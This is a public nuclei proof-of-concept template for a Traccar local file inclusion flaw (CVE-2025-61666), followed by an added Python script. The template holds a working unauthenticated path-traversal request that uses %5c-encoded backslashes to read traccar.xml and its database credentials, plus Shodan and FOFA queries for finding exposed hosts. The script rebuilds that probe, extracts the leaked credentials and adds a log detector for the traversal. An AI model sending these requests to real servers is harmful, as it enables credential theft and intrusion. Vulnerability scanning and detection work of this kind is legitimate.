Traccar 5.8-6.0 (non-default installs with web.override set) and 6.1-6.8.1 (default installs) contain a local file inclusion vulnerability: with the web override configuration enabled, the embedded web server accepts percent-encoded backslash (%5c) path-traversal sequences, so an unauthenticated attacker can read arbitrary files from the host over HTTP, including traccar.xml with the database credentials.
PoC code [public]
id: CVE-2025-61666

info:
  name: Traccar (Windows) 6.1-6.8.1 - Local File Inclusion
  author: securitytaters
  severity: high
  description: |
    Traccar 5.8-6.0 (non-default installs with web.override set) and 6.1-6.8.1 (default installs) contain a local file inclusion vulnerability: with the web override configuration enabled, the embedded web server accepts percent-encoded backslash (%5c) path-traversal sequences, so an unauthenticated attacker can read arbitrary files from the host over HTTP. The request below targets the default Windows install path of traccar.xml, which holds the database credentials.
  impact: |
    Unauthenticated remote attackers can read arbitrary files from the server, exposing sensitive information such as database passwords and configuration data.
  remediation: |
    Upgrade to version 6.9.0 or later.
  reference:
    - https://github.com/traccar/traccar/security/advisories/GHSA-hprc-rph8-fj87
    - https://projectblack.io/blog/jetty-addpath-lfi/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Traccar"
    fofa-query: app="Traccar"
  tags: cve,cve2025,traccar,lfi,vuln

http:
  - raw:
      - |
        GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/xml")'
          - 'contains_all(body, "database.driver","database.password","database.user")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207340ebd5cdafb38a4ff1a63758e1421f0d78cf73864d5d029b687b5f4dfb3cfd02210087c2e65e1fb09892d27be8dfb27613967d93c91c46f2a37d8062a3726bb8eef9:922c64590222798bb761d5b6d8e72950
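The following Python is an added example, not code from Traccar or from the nuclei template above. It rebuilds the template's probe path and its three matcher conditions so they can be checked offline, parses the leaked traccar.xml into its database.* entries (masking the password when printed), and gives defenders a log-side check that catches the encoded-backslash traversal the template relies on, which a rule matching only on `../` would miss. The Windows install path, the traccar.xml contents and the access-log lines are constructed for illustration.

```python
"""Reference checks for the Traccar web.override path traversal (CVE-2025-61666).

Added example; this is not Traccar's code nor the nuclei template itself.
All sample data below is constructed for illustration."""
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Windows install path assumed by the template's payload (assumption: a
# non-default install location needs a different target).
DEFAULT_TARGET = r"Program Files\traccar\conf\traccar.xml"
REQUIRED_KEYS = ("database.driver", "database.password", "database.user")


def build_probe_path(target=DEFAULT_TARGET, depth=8):
    """Build the request path the template sends: '..' segments joined by
    percent-encoded backslashes (%5c). Encoding the separator keeps the
    dot-dot segments from being normalised away before the server decodes
    them and, on Windows, treats the backslash as a path separator."""
    segments = [".."] * depth + target.split("\\")
    return "/" + "%5c".join(urllib.parse.quote(s, safe="") for s in segments)


def matches(status_code, content_type, body):
    """The template's three DSL conditions, ANDed: HTTP 200, an XML content
    type and all three database.* keys present in the body."""
    return (status_code == 200
            and "application/xml" in content_type
            and all(key in body for key in REQUIRED_KEYS))


def extract_entries(body, prefix="database."):
    """Pull <entry key='...'> values from a leaked Java-properties XML file
    (the layout of traccar.xml); only keys with the given prefix are kept."""
    root = ET.fromstring(body)
    return {
        entry.get("key"): (entry.text or "")
        for entry in root.iter("entry")
        if entry.get("key", "").startswith(prefix)
    }


# A '..' segment bounded by either separator style, checked after decoding.
_TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def request_is_traversal(raw_path):
    """Detection side: decode twice (catches double encoding) and look for a
    '..' segment delimited by '/' or '\\'."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(raw_path))
    return _TRAVERSAL.search(decoded) is not None


# Constructed Jetty-style access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Nov/2025:10:00:01 +0000] "GET /api/server HTTP/1.1" 200 512
203.0.113.7 - - [01/Nov/2025:10:00:02 +0000] "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1" 200 1381
203.0.113.8 - - [01/Nov/2025:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 2044
"""
_REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def scan_access_log(text):
    """Return the log lines whose request path contains a traversal segment."""
    hits = []
    for line in text.splitlines():
        m = _REQ.search(line)
        if m and request_is_traversal(m.group(1)):
            hits.append(line)
    return hits


# Constructed traccar.xml, in Traccar's Java-properties XML layout.
SAMPLE_TRACCAR_XML = """<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE properties SYSTEM 'http://java.sun.com/dtd/properties.dtd'>
<properties>
    <entry key='config.default'>./conf/default.xml</entry>
    <entry key='database.driver'>org.h2.Driver</entry>
    <entry key='database.url'>jdbc:h2:./data/database</entry>
    <entry key='database.user'>sa</entry>
    <entry key='database.password'>s3cret</entry>
</properties>
"""

if __name__ == "__main__":
    print("probe path:", build_probe_path())
    if matches(200, "application/xml;charset=UTF-8", SAMPLE_TRACCAR_XML):
        for key, value in extract_entries(SAMPLE_TRACCAR_XML).items():
            shown = "*" * len(value) if key == "database.password" else value
            print(f"  {key} = {shown}")
    for hit in scan_access_log(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

`build_probe_path()` reproduces the template's request line byte for byte; to probe a non-default install, pass the real path of `traccar.xml` as `target`. The log check decodes before matching because the whole point of the `%5c` payload is that a single pass over the raw URI sees neither `../` nor `..\`.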